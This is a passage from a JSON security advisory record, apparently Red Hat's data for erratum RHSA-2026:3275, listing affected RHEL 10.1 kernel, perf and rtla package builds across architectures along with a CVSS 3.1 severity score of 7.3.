"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3275"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
